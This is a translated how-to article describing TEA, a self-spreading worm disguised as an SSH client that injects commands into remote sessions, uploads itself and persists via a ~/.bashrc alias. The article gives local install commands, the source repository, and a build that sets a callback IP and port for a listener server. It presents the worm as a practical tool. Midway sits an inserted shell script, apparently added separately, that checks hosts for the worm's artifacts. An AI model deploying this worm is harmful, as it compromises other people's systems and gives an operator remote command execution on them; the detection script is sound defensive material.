
What is TEA?

2025-01-23 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains what TEA is. The editor finds it very practical and shares it here as a reference.

TEA is an SSH client worm based on the TAS framework. In essence, it is a fake SSH client that modifies tty input/output to execute arbitrary commands, or uploads itself through an SSH connection to spread the infection.

In order for the tool to function properly, the remote host needs to meet the following conditions:

1. The "Last login" message is displayed when logging in

2. dd and stty are available

3. The target user uses Bash as the default shell

4. The host can run the fakessh code

5. ~/.bashrc is writable

Infect the local host:

$ mkdir ~/.sshworm
$ cp ssh ~/.sshworm
$ alias ssh='~/.sshworm/ssh'

When we first execute fakessh, nothing is displayed; the tool executes the code in post-install.c and writes the string alias ssh="~/.sshworm/ssh" to ~/.bashrc:

$ ssh
$ ssh
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-J [user@]host[:port]] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] destination [command]

Transmission and infection:

We only need to connect to the target SSH server, and if the server meets the TEA operating conditions, the target device and the host connected to the target device can be successfully infected.

Tty modification:

After fakessh starts, it waits for the string "Last login" (output-hooks.c). When it receives "Last login", it sends some arbitrary commands (inject-cmd.c) and waits for the result of the command execution (output-hooks.c). If the file ~/.sshworm/ssh does not exist on the remote device, the worm uploads itself (upload.c).
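The artifacts described above (the ~/.sshworm directory, the ~/.sshworm/ssh file and the ssh alias in ~/.bashrc) can be checked for on a host. The following is an added example, not code from the TEA project or the original article; the function names tea_findings and tea_scan and the sample home directories are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the TEA project): look for the artifacts the article
# names: the ~/.sshworm directory, the ~/.sshworm/ssh file, and an
# "alias ssh=" line in ~/.bashrc that points into .sshworm.

# tea_findings HOME_DIR: print one line per indicator found (nothing if clean).
tea_findings() {
    h=$1
    if [ -d "$h/.sshworm" ]; then
        echo "$h: .sshworm directory exists"
    fi
    if [ -e "$h/.sshworm/ssh" ]; then
        echo "$h: replaced ssh client at .sshworm/ssh"
    fi
    # Accept either quote style, ~ or an absolute path, and leading spaces.
    if [ -r "$h/.bashrc" ] &&
        grep -Eq '^[[:space:]]*alias[[:space:]]+ssh=.*\.sshworm/ssh' "$h/.bashrc"
    then
        echo "$h: .bashrc aliases ssh to .sshworm/ssh"
    fi
    return 0
}

# tea_scan HOME_DIR...: print all findings; return 1 if any directory has one.
tea_scan() {
    rc=0
    for home in "$@"; do
        out=$(tea_findings "$home")
        if [ -n "$out" ]; then
            printf '%s\n' "$out"
            rc=1
        fi
    done
    return "$rc"
}

# Constructed sample input: one home with the artifacts, one without.
demo=$(mktemp -d)
mkdir -p "$demo/alice/.sshworm" "$demo/bob"
: > "$demo/alice/.sshworm/ssh"
echo 'alias ssh="~/.sshworm/ssh"' > "$demo/alice/.bashrc"
echo 'alias ll="ls -l"' > "$demo/bob/.bashrc"
if tea_scan "$demo/alice" "$demo/bob"; then
    echo "clean"
else
    echo "TEA indicators found"
fi
rm -rf "$demo"
```

On a real host, pass the home directories to check, for example tea_scan /home/* /root.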

Uninstall:

$ rm -rf ~/.sshworm
$ perl -i -pe 's;alias ssh="~/.sshworm/ssh";;g' ~/.bashrc
$ unalias ssh

Compilation:

I recommend that you use musl-libc, or another libc, but I do not recommend that you use glibc, because the code compiled with glibc can be very large.

Get the source code:

$ git clone --recurse-submodules https://github.com/hc0d3r/tea

Build options:

| Name | Description |
|------|-------------|
| IP | remote IPv4 connection |
| PORT | remote port connection |

Sample:

$ make CC=musl-gcc IP=my-ipv4 PORT=1234

Server

Here we have made a simple server to handle the connection: when the post-install.c code is executed, the server receives the connection. The server mechanism is very simple. When a new connection is successfully established, it executes a new command and passes the connection's file descriptor through the command line so that the executed program can handle the connection.

Compilation:

$ cd server
$ make
cc -Wall -Wextra -O3 -c net.c -o net.o
cc -Wall -Wextra -O3 -c replace.c -o replace.o
cc -Wall -Wextra -O3 -c term.c -o term.o
cc -Wall -Wextra -O3 -c main.c -o main.o
cc -Wall -Wextra -O3 -o server net.o replace.o term.o main.o
